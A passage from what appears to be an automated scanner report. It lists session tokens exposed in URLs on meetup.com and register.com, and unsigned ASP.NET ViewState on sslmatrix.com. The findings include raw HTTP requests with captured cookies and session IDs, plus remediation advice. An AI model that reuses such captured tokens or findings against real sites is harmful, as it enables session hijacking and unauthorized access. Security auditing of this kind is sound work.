The URL in the request appears to contain a session token within the query string:

http://www.meetup.com/api/?method=storeStart&arg_uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&arg_process=ghrollout&arg_session=1535927&arg_page=ghome&arg_score=0&arg_variant=new&arg_memberId=0&arg_chapterId=1535927

Request

GET /api/?method=storeStart&arg_uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&arg_process=ghrollout&arg_session=1535927&arg_page=ghome&arg_score=0&arg_variant=new&arg_memberId=0&arg_chapterId=1535927 HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; MEETUP_GA=id%3D0%26segment%3Dalien; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.4.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien; trax_ghrollout#1535927=uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&v=new&p=ghome&s=0&_=cf8b24

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:40 GMT
Server: Apache-Coyote/1.1
Expires: 0
X-Meetup-server: app9.int.meetup.com
Content-Type: application/json;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 2
Connection: close

""

8.12. http://www.register.com/css/home-optimized.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.register.com
Path:	/css/home-optimized.css

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.register.com/css/home-optimized.css;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production

Request

GET /css/home-optimized.css;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:36 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/css/home-optimized.css
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/css/home-optimized.css"
...[SNIP]...

8.13. http://www.register.com/js/aop-attach.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.register.com
Path:	/js/aop-attach.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.register.com/js/aop-attach.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production

Request

GET /js/aop-attach.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:41 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/js/aop-attach.js
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/js/aop-attach.js">here<
...[SNIP]...

8.14. http://www.register.com/js/homepage-optimized.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.register.com
Path:	/js/homepage-optimized.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.register.com/js/homepage-optimized.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production

Request

GET /js/homepage-optimized.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:55 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/js/homepage-optimized.js
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/js/homepage-optimized.j
...[SNIP]...

8.15. http://www.register.com/js/jquery-1.3.2.min.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.register.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.register.com/js/jquery-1.3.2.min.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production

Request

GET /js/jquery-1.3.2.min.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:41 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/js/jquery-1.3.2.min.js
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/js/jquery-1.3.2.min.js"
...[SNIP]...

9. ASP.NET ViewState without MAC enabled previous next
There are 3 instances of this issue:

/Order/quickorder
/ssl-promotion-code
/ssl-promotion-code/ssl-price

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

9.1. https://www.sslmatrix.com/Order/quickorder previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/Order/quickorder

Request

GET /Order/quickorder?pid=1&yr=5&ot=new&cc=smr09 HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:26:02 GMT
Content-Length: 59992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTY3NTg0ODQ1Mg9kFgJmD2QWAmYPZBYCAgMPFgIeBmFjdGlvbgUsL09yZGVyL3F1aWNrb3JkZXI/cGlkPTEmeXI9NSZvdD1uZXcmY2M9c21yMDkWAgIBD2QWCgIBD2QWAmYPZBYCZg9kFgICAQ8WAh4EVGV4dAX4DzxwIGNsYXNzPSJsb2dvX3BhZGRpbmciPjxhIGhyZWY9Ii8iPjxpbWcgc3JjPSIvaW1hZ2VzL2xvZ28ucG5nIiBib3JkZXI9IjAiIGFsdD0iQ2hlYXAgU1NMIiAvPjwvYT48L3A+DQo8ZGl2IGNsYXNzPSJ0b3BfdGV4dCI+R2xvYmFsIFN1cHBsaWVyIE9mIFRydXN0ZWQgU1NMIENlcnRpZmljYXRlcyAmYW1wOyBTaXRlIFNlYWwuPC9kaXY+DQo8IS0tIEJFR0lOIExpdmVQZXJzb24gTW9uaXRvci4gLS0+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQogICAgICAgIHZhciBscE1UYWdDb25maWcgPSB7ICdscFNlcnZlcic6ICJzZXJ2ZXIuaWFkLmxpdmVwZXJzb24ubmV0IiwgJ2xwTnVtYmVyJzogIjU3OTM3ODAzIiwgJ2xwUHJvdG9jb2wnOiAiaHR0cHMiIH07DQogICAgICAgIGZ1bmN0aW9uIGxwQWRkTW9uaXRvclRhZyhzcmMpIHsNCiAgICAgICAgICAgIGlmICh0eXBlb2YgKHNyYykgPT0gJ3VuZGVmaW5lZCcgfHwgdHlwZW9mIChzcmMpID09ICdvYmplY3QnKSB7DQogICAgICAgICAgICAgICAgc3JjID0gbHBNVGFnQ29uZmlnLmxwTVRhZ1NyYyA/IGxwTVRhZ0NvbmZpZy5scE1UYWdTcmMgOiAnL2hjcC9odG1sL21UYWcuanMnOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCdodHRwJykgIT0gMCkgew0KICAgICAgICAgICAgICAgIHNyYyA9IGxwTVRhZ0NvbmZpZy5scFByb3RvY29sICsgIjovLyIgKyBscE1UYWdDb25maWcubHBTZXJ2ZXIgKyBzcmMgKyAnP3NpdGU9JyArIGxwTVRhZ0NvbmZpZy5scE51bWJlcjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGVsc2Ugew0KICAgICAgICAgICAgICAgIGlmIChzcmMuaW5kZXhPZignc2l0ZT0nKSA8IDApIHsNCiAgICAgICAgICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCc/JykgPCAwKSBzcmMgPSBzcmMgKyAnPyc7IGVsc2Ugc3JjID0gc3JjICsgJyYnOyBzcmMgPSBzcmMgKyAnc2l0ZT0nICsgbHBNVGFnQ29uZmlnLmxwTnVtYmVyOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH07IHZhciBzID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IHMuc2V0QXR0cmlidXRlKCd0eXBlJywgJ3RleHQvamF2YXNjcmlwdCcpOyBzLnNldEF0dHJpYnV0ZSgnY2hhcnNldCcsICdpc28tODg1OS0xJyk7IHMuc2V0QXR0cmlidXRlKCdzcmMnLCBzcmMpOyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaGVhZCcpLml0ZW0oMCkuYXBwZW5kQ2hpbGQocyk7DQogICAgICAgIH0gaWYgKHdpbmRvdy5hdHRhY2hFdmVudCkgd2luZG93LmF0dGFjaEV2ZW50KCdvbmxvYWQnLCBscEFkZE1vbml0b3JUYWcpOyBlbHNlIHdpbmRvdy5hZGRFdmVudExpc3RlbmVyKCJsb2FkIiwgbHBBZGRNb25pdG9yVGFnLCBmYWxzZSk7DQovLyBdXT48L3NjcmlwdD4NCjwhLS0gRU5EIExpdmVQZXJzb24gTW9uaXRvci4gLS0+IDwhLS0gTGl2ZSBDaGF0IENvZGUgRW5kcyBIZXJlICAtLT4gPCEtLSBFTkQgTGl2ZVBlcnNvbiBNb25pdG9yLiAtLT4gPCEtLSBHb29nbGUgQW5hbHl0aWNzIENvZGUgU3RhcnQgLS0+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQp2YXIgZ2FKc0hvc3QgPSAoKCJodHRwczoiID09IGRvY3VtZW50LmxvY2F0aW9uLnByb3RvY29sKSA/ICJodHRwczovL3NzbC4iIDogImh0dHA6Ly93d3cuIik7DQpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgiJTNDc2NyaXB0IHNyYz0nIiArIGdhSnNIb3N0ICsgImdvb2dsZS1hbmFseXRpY3MuY29tL2dhLmpzJyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdCUzRSIpKTsNCi8vIF1dPjwvc2NyaXB0Pg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPi8vIDwhW0NEQVRBWw0KdHJ5IHsNCnZhciBwYWdlVHJhY2tlciA9IF9nYXQuX2dldFRyYWNrZXIoIlVBLTExODU0MTEwLTQiKTsNCnBhZ2VUcmFja2VyLl90cmFja1BhZ2V2aWV3KCk7DQp9IGNhdGNoKGVycikge30NCi8vIF1dPjwvc2NyaXB0Pg0KPCEtLSBHb29nbGUgQW5hbHl0aWNzIENvZGUgRW5kIC0tPmQCBQ9kFgICAQ9kFgJmD2QWAmYPZBYCZg8WAh8BBcYKPGRpdiBjbGFzcz0iYmxvY2sgc3NsLWJ5LWJyYW5kIj4NCjxkaXYgY2xhc3M9ImJsb2NrLXRpdGxlIj48c3Bhbj5TU0wgYnkgQnJhbmQ8L3NwYW4+PC9kaXY+DQo8ZGl2IGNsYXNzPSJibG9jay1jb250ZW50Ij4NCjx1bD4NCjxsaT48YSBocmVmPSIvc3NsLWJyYW5kcy9yYXBpZHNzbCI+DQo8aDE+UmFwaWRTU0w8L2gxPg0KPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbC1icmFuZHMvZ2VvdHJ1c3Qtc3NsIj4NCjxoMT5HZW9UcnVzdDwvaDE+DQo8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbC1icmFuZHMvdGhhd3RlLXNzbCI+DQo8aDE+VGhhd3RlPC9oMT4NCjwvYT48L2xpPg0KPGxpIGNsYXNzPSJ0aXRsZSI+U1NMIGJ5IFByaWNlPC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSMwdG81MCI+JDAgLSAkNTA8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSM1MHRvMTAwIj4kNTAgLSAkMTAwPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbC1wcm9tb3Rpb24tY29kZS9zc2wtcHJpY2UjMTAwdG8yMDAiPiQxMDAgLSAkMjAwPC9hPjwvbGk+DQo8bGkgY2xhc3M9Imxhc3QiPjxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUvc3NsLXByaWNlIzIwMCI+JDIwMCAtIE1vcmU8L2E+PC9saT4NCjxsaSBjbGFzcz0idGl0bGUiPlNTTCBieSBUeXBlPC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2RvbWFpbi1zc2wiPkRvbWFpbiBWYWxpZGF0aW9uIFNTTDwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2xjZXJ0aWZpY2F0ZXMvYnVzaW5lc3MtdmFsaWRhdGlvbi1zc2wiPkJ1c2luZXNzIFZhbGlkYXRpb24gU1NMPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy93aWxkY2FyZC1jZXJ0aWZpY2F0ZXMiPg0KPGgxPldpbGRjYXJkIFNTTCBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2V2LXNzbC1jZXJ0aWZpY2F0ZXMiPg0KPGgxPkVWIFNTTCBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy9jb2RlLXNpZ25pbmctY2VydGlmaWNhdGUiPg0KPGgxPkNvZGUgU2lnbmluZyBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjwvdWw+DQo8L2Rpdj4NCjwvZGl2Pg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsgY2xlYXI6IGJvdGg7Ij4NCjxzY3JpcHQgc3JjPSJodHRwczovL3NtYXJ0aWNvbi5nZW90cnVzdC5jb20vc2kuanMiIHR5cGU9InRleHQvamF2YXNjcmlwdCI+PC9zY3JpcHQ+DQo8L3A+ZAIGD2QWAgIBD2QWAmYPZBYIZg8WAh8BBRRSYXBpZFNTTCBDZXJ0aWZpY2F0ZWQCAQ9kFgJmD2QWAmYPZBYCAgEPFgIeC18hSXRlbUNvdW50AgUWCgIBD2QWBAIBDxYGHgV0aXRsZQUGJDI1LjAwHgV2YWx1ZQUBMR4EbmFtZQUBMWQCAg8VAQExZAICD2QWBAIBDxYGHwMFBiQ0NS4wMB8EBQEyHwUFATJkAgIPFQEBMmQCAw9kFgQCAQ8WBh8DBQYkNjUuMDAfBAUBMx8FBQEzZAICDxUBATNkAgQPZBYEAgEPFgYfAwUGJDg1LjAwHwQFATQfBQUBNGQCAg8VAQE0ZAIFD2QWBAIBDxYGHwMFBiQ5NS4wMB8EBQE1HwUFATVkAgIPFQEBNWQCAw8QDxYCHgdWaXNpYmxlaGRkFgFmZAIEDxYCHwZoFgICAg9kFgICAQ8QZGQWAGQCBw9kFgQCAQ9kFgJmD2QWAmYPZBYCAgEPFgIfAgIFFgxmD2QWAgIBDxYCHwZoZAIBD2QWBGYPFQQAATEFMjUuMDAFMjQuMDBkAgEPFgIfBmgWAmYPFQEEMC4wMGQCAg9kFgRmDxUEBWNvbG9yATIFMjIuNTAFNDEuMDBkAgEPFgIfBmgWAmYPFQEEMC4wMGQCAw9kFgRmDxUEAAEzBTIxLjY3BTU3LjAwZAIBDxYCHwZoFgJmDxUBBDAuMDBkAgQPZBYEZg8VBAVjb2xvcgE0BTIxLjI1BTc0LjAwZAIBDxYCHwZoFgJmDxUBBDAuMDBkAgUPZBYEZg8VBAUgbGFzdAE1BTE5LjAwBjEwMS4wMGQCAQ8WAh8GaBYCZg8VAQQwLjAwZAIDD2QWAmYPZBYCZg9kFgJmDxYCHwEF3gQ8cCBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PGltZyBzcmM9Ii9pbWFnZXMvMzBkYXlzbW9uZXliYWNrLmpwZyIgYWx0PSIzMCBEYXlzIE1vbmV5IEJhY2siIC8+PC9wPg0KPHA+Jm5ic3A7PC9wPg0KPGRpdiBjbGFzcz0iYmxvY2sgcGxhdGludW1fcGFydG5lciI+DQo8ZGl2IGNsYXNzPSJibG9jay10aXRsZSI+PHNwYW4+U1NMIFJlc2VsbGVyPC9zcGFuPjwvZGl2Pg0KPGRpdiBjbGFzcz0iYmxvY2stY29udGVudCI+PGltZyBzcmM9Ii9pbWFnZXMvcmFwaWRfc3NsLmpwZyIgYWx0PSJSYXBpZFNTTCIgLz48YnIgLz48YnIgLz48aW1nIHNyYz0iL2ltYWdlcy9nZW90cnVzdF9zc2wuanBnIiBhbHQ9Ikdlb1RydXN0IiAvPjxiciAvPjxiciAvPjxpbWcgc3JjPSIvaW1hZ2VzL3RoYXd0ZV9zc2wuanBnIiBhbHQ9IlRoYXd0ZSIgLz48L2Rpdj4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0iYmxvY2sgcGF5cGFsIj4NCjxkaXYgY2xhc3M9ImJsb2NrLXRpdGxlIj48c3Bhbj5XZSBBY2NlcHQ8L3NwYW4+PC9kaXY+DQo8ZGl2IGNsYXNzPSJibG9jay1jb250ZW50Ij48aW1nIHNyYz0iL2ltYWdlcy9wYXlwYWwuanBnIiBhbHQ9IlBheVBhbCBTU0wiIC8+PC9kaXY+DQo8L2Rpdj5kAgkPZBYCZg9kFgJmD2QWAgIBDxYCHwEF8wY8ZGl2IGNsYXNzPSJmb290ZXJfdG9wIj4NCjxkaXYgY2xhc3M9ImJyb3dzZXJzIj48aW1nIHNyYz0iL2ltYWdlcy9icm93c2Vycy5qcGciIGFsdD0iIiAvPjwvZGl2Pg0KPGRpdiBjbGFzcz0icHVyY2hhc2UiPjxpbWcgc3JjPSIvaW1hZ2VzL3B1cmNoYXNlLXdvcmtzLmpwZyIgYWx0PSJCdXkgQ2hlYXAgU1NMIENlcnRpZmljYXRlcyIgLz48L2Rpdj4NCjx1bD4NCjxoMj5XaHkgU1NMTWF0cml4LmNvbT88L2gyPg0KPGxpPjMwIERheSAxMDAlIG1vbmV5IGJhY2sgZ3VhcmFudGVlPC9saT4NCjxsaT5FYXN5IGFuZCBzZWN1cmUgU1NMIG9yZGVyIHByb2Nlc3M8L2xpPg0KPGxpPkluc3RhbnQgU1NMIGlzc3VhbmNlIC0gMjQvNy8zNjU8L2xpPg0KPGxpPkxpZmUgc3BhbiBmcmVlIFNTTCByZWlzc3VlIGluc3VyYW5jZTwvbGk+DQo8bGk+V29ybGQgd2lkZSBhdXRob3JpemVkIFNTTCByZXNlbGxlcjwvbGk+DQo8bGk+RnJlZSBTU0wgc2l0ZSBzZWFsIG9uIFNTTCBwdXJjaGFzZTwvbGk+DQo8L3VsPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJmb290ZXJfYm90dG9tIj4NCjxkaXYgY2xhc3M9ImZvb3Rlcl9ib3R0b21fbGVmdCI+PGEgaHJlZj0iLyI+SG9tZTwvYT4gfCA8YSBocmVmPSIvc3NsLWJyYW5kcyI+U1NMIEJyYW5kczwvYT4gfCA8YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzIj5TU0wgQ2VydGlmaWNhdGVzPC9hPiB8IDxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUiPlNTTCBQcm9tb3Rpb248L2E+IHwgPGEgaHJlZj0iL1NTTFRvb2xzIj5TU0wgVG9vbHM8L2E+IHwgPGEgaHJlZj0iL2NvbnRhY3R1cyI+Q29udGFjdCBVczwvYT4gfCA8YSBocmVmPSIvU1NMVG9vbHMvd2hhdC1pcy1zc2wtY2VydGlmaWNhdGUiPlNTTCBGQVFzPC9hPjwvZGl2Pg0KPC9kaXY+ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDQVgY3RsMDAkY3RsMDAkY3BoTWFpbiRDb250ZW50UGxhY2VIb2xkZXIxJGN0bDAwJHVjT3JkZXJQcmljaW5nJGN0bDAwJHJwdFllYXJTZWxlY3QkY3RsMDEkcmRvU2VsZWN0BWBjdGwwMCRjdGwwMCRjcGhNYWluJENvbnRlbnRQbGFjZUhvbGRlcjEkY3RsMDAkdWNPcmRlclByaWNpbmckY3RsMDAkcnB0WWVhclNlbGVjdCRjdGwwMiRyZG9TZWxlY3QFYGN0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCR1Y09yZGVyUHJpY2luZyRjdGwwMCRycHRZZWFyU2VsZWN0JGN0bDAzJHJkb1NlbGVjdAVgY3RsMDAkY3RsMDAkY3BoTWFpbiRDb250ZW50UGxhY2VIb2xkZXIxJGN0bDAwJHVjT3JkZXJQcmljaW5nJGN0bDAwJHJwdFllYXJTZWxlY3QkY3RsMDQkcmRvU2VsZWN0BWBjdGwwMCRjdGwwMCRjcGhNYWluJENvbnRlbnRQbGFjZUhvbGRlcjEkY3RsMDAkdWNPcmRlclByaWNpbmckY3RsMDAkcnB0WWVhclNlbGVjdCRjdGwwNSRyZG9TZWxlY3QFM2N0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCRyZE5ldwU1Y3RsMDAkY3RsMDAkY3BoTWFpbiRDb250ZW50UGxhY2VIb2xkZXIxJGN0bDAwJHJkUmVuZXcFNWN0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCRyZFJlbmV3BTljdGwwMCRjdGwwMCRjcGhNYWluJENvbnRlbnRQbGFjZUhvbGRlcjEkY3RsMDAkcmRVc2VyTG9naW4FNmN0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCRyZFBheU5vdwU2Y3RsMDAkY3RsMDAkY3BoTWFpbiRDb250ZW50UGxhY2VIb2xkZXIxJGN0bDAwJHJkUGF5Tm93BTZjdGwwMCRjdGwwMCRjcGhNYWluJENvbnRlbnRQbGFjZUhvbGRlcjEkY3RsMDAkcmRTaWduVXAFNmN0bDAwJGN0bDAwJGNwaE1haW4kQ29udGVudFBsYWNlSG9sZGVyMSRjdGwwMCRyZFNpZ25VcA==" />
...[SNIP]...

9.2. https://www.sslmatrix.com/ssl-promotion-code previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/ssl-promotion-code

Request

